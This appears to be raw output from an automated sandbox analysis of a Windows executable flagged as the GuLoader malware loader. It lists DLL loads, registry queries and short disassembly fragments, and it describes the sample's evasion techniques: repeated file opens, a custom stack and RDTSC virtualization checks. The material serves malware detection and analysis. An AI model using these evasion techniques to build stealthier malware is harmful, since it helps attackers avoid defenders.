    Source: C:\Users\user\Desktop\3507071243740008011.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 3507071243740008011.exeReversingLabs: Detection: 31%
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile read: C:\Users\user\Desktop\3507071243740008011.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: 3507071243740008011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000000.00000002.2641992068.0000000005438000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D2135D push eax; iretd 5_2_36D21369
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D227FA pushad ; ret 5_2_36D227F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D2225F pushad ; ret 5_2_36D227F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D2283D push eax; iretd 5_2_36D22858
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D509AD push ecx; mov dword ptr [esp], ecx5_2_36D509B6
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile created: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Opens the same file many times (likely Sandbox evasion)
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722Jump to behavior
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI/Special instruction interceptor: Address: 59AA0FB
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI/Special instruction interceptor: Address: 458A0FB
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\3507071243740008011.exeRDTSC instruction interceptor: First address: 596FD31 second address: 596FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F2C6C77DF87h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exeRDTSC instruction interceptor: First address: 454FD31 second address: 454FD31 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F2C6D012067h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD1C0 rdtsc 5_2_36DCD1C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI coverage: 0.1 %
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006C58000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL'Y
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI call chain: ExitProcess graph end nodegraph_0-4581
    Source: C:\Users\user\Desktop\3507071243740008011.exeAPI call chain: ExitProcess graph end nodegraph_0-4577
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD1C0 rdtsc 5_2_36DCD1C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D935C0 NtCreateMutant,LdrInitializeThunk,5_2_36D935C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0D6F0 mov eax, dword ptr fs:[00000030h]5_2_36E0D6F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h]5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h]5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h]5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h]5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h]5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B6C0 mov eax, dword ptr fs:[00000030h]5_2_36D5B6C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D816CF mov eax, dword ptr fs:[00000030h]5_2_36D816CF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F6C7 mov eax, dword ptr fs:[00000030h]5_2_36E0F6C7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h]5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h]5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h]5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E116CC mov eax, dword ptr fs:[00000030h]5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h]5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h]5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h]5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h]5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h]5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE36EE mov eax, dword ptr fs:[00000030h]5_2_36DE36EE
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D6E0 mov eax, dword ptr fs:[00000030h]5_2_36D7D6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D6E0 mov eax, dword ptr fs:[00000030h]5_2_36D7D6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h]5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h]5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h]5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD368C mov eax, dword ptr fs:[00000030h]5_2_36DD368C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D476B2 mov eax, dword ptr fs:[00000030h]5_2_36D476B2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D476B2 mov eax, dword ptr fs:[00000030h]5_2_36D476B2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D476B2 mov eax, dword ptr fs:[00000030h]5_2_36D476B2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D6AA mov eax, dword ptr fs:[00000030h]5_2_36D4D6AA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D6AA mov eax, dword ptr fs:[00000030h]5_2_36D4D6AA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D89660 mov eax, dword ptr fs:[00000030h]5_2_36D89660
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D89660 mov eax, dword ptr fs:[00000030h]5_2_36D89660
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DED660 mov eax, dword ptr fs:[00000030h]5_2_36DED660
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53616 mov eax, dword ptr fs:[00000030h]5_2_36D53616
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53616 mov eax, dword ptr fs:[00000030h]5_2_36D53616
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25636 mov eax, dword ptr fs:[00000030h]5_2_36E25636
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8F603 mov eax, dword ptr fs:[00000030h]5_2_36D8F603
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D81607 mov eax, dword ptr fs:[00000030h]5_2_36D81607
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F626 mov eax, dword ptr fs:[00000030h]5_2_36D4F626
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D557C0 mov eax, dword ptr fs:[00000030h]5_2_36D557C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D557C0 mov eax, dword ptr fs:[00000030h]5_2_36D557C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D557C0 mov eax, dword ptr fs:[00000030h]5_2_36D557C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5D7E0 mov ecx, dword ptr fs:[00000030h]5_2_36D5D7E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0D7B0 mov eax, dword ptr fs:[00000030h]5_2_36E0D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0D7B0 mov eax, dword ptr fs:[00000030h]5_2_36E0D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E237B6 mov eax, dword ptr fs:[00000030h]5_2_36E237B6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D7B0 mov eax, dword ptr fs:[00000030h]5_2_36D7D7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F78A mov eax, dword ptr fs:[00000030h]5_2_36E0F78A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F7BA mov eax, dword ptr fs:[00000030h]5_2_36D4F7BA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h]5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h]5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h]5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h]5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDF7AF mov eax, dword ptr fs:[00000030h]5_2_36DDF7AF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD97A9 mov eax, dword ptr fs:[00000030h]5_2_36DD97A9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h]5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h]5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h]5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h]5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF375F mov eax, dword ptr fs:[00000030h]5_2_36DF375F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D63740 mov eax, dword ptr fs:[00000030h]5_2_36D63740
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D63740 mov eax, dword ptr fs:[00000030h]5_2_36D63740
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D63740 mov eax, dword ptr fs:[00000030h]5_2_36D63740
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E23749 mov eax, dword ptr fs:[00000030h]5_2_36E23749
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h]5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h]5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h]5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B765 mov eax, dword ptr fs:[00000030h]5_2_36D4B765
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8F71F mov eax, dword ptr fs:[00000030h]5_2_36D8F71F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8F71F mov eax, dword ptr fs:[00000030h]5_2_36D8F71F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1972B mov eax, dword ptr fs:[00000030h]5_2_36E1972B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F72E mov eax, dword ptr fs:[00000030h]5_2_36E0F72E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57703 mov eax, dword ptr fs:[00000030h]5_2_36D57703
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D55702 mov eax, dword ptr fs:[00000030h]5_2_36D55702
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D55702 mov eax, dword ptr fs:[00000030h]5_2_36D55702
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h]5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h]5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h]5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2B73C mov eax, dword ptr fs:[00000030h]5_2_36E2B73C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49730 mov eax, dword ptr fs:[00000030h]5_2_36D49730
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49730 mov eax, dword ptr fs:[00000030h]5_2_36D49730
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D85734 mov eax, dword ptr fs:[00000030h]5_2_36D85734
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5973A mov eax, dword ptr fs:[00000030h]5_2_36D5973A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5973A mov eax, dword ptr fs:[00000030h]5_2_36D5973A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53720 mov eax, dword ptr fs:[00000030h]5_2_36D53720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F720 mov eax, dword ptr fs:[00000030h]5_2_36D6F720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F720 mov eax, dword ptr fs:[00000030h]5_2_36D6F720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6F720 mov eax, dword ptr fs:[00000030h]5_2_36D6F720
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E254DB mov eax, dword ptr fs:[00000030h]5_2_36E254DB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF94E0 mov eax, dword ptr fs:[00000030h]5_2_36DF94E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D59486 mov eax, dword ptr fs:[00000030h]5_2_36D59486
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D59486 mov eax, dword ptr fs:[00000030h]5_2_36D59486
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B480 mov eax, dword ptr fs:[00000030h]5_2_36D4B480
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D474B0 mov eax, dword ptr fs:[00000030h]5_2_36D474B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D474B0 mov eax, dword ptr fs:[00000030h]5_2_36D474B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D834B0 mov eax, dword ptr fs:[00000030h]5_2_36D834B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF74B0 mov eax, dword ptr fs:[00000030h]5_2_36DF74B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h]5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h]5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h]5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFB450 mov eax, dword ptr fs:[00000030h]5_2_36DFB450
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h]5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h]5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h]5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h]5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h]5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5B440 mov eax, dword ptr fs:[00000030h]5_2_36D5B440
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2547F mov eax, dword ptr fs:[00000030h]5_2_36E2547F
